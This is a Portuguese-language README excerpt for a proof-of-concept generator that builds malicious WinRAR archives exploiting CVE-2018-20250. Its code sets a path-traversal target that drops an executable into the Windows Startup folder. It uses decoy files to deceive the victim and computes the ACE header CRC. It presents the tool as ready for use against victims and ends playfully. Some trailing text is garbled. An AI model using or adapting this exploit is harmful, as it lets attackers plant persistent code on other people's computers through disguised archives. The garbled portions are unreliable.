
Gera arquivos RAR maliciosos automaticamente para explorar o CVE-2018-20250 e obter execução de código via path traversal do WinRAR ACE.
exploit para Extrair Execução de Código do WinRAR
poc por Ridter
como usar?
você só precisa instalar o Python 3.7 e preparar um arquivo malicioso que deseja executar, definir os valores desejados, este script de exploit gerará o arquivo malicioso automaticamente!
... ...
# O nome do arquivo do archive que você deseja
rar_filename = "test.rar"
# O arquivo malicioso que você deseja executar
evil_filename = "calc.exe"
# O caminho de descompressão desejado, conforme mostrado abaixo
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Outros arquivos a serem exibidos quando a vítima abrir o winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# Este comando pode ser diferente, depende do seu ambiente Python3.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
test.rar automaticamentetest.rar, ela verá os arquivos hello.txt e world.txt, você também pode adicionar mais arquivos, mais atraentes.![]()
hi.exe, na verdade é um calc.exe. quando ela reiniciar o computador, o hi.exe será executado.![]()
divirta-se! :)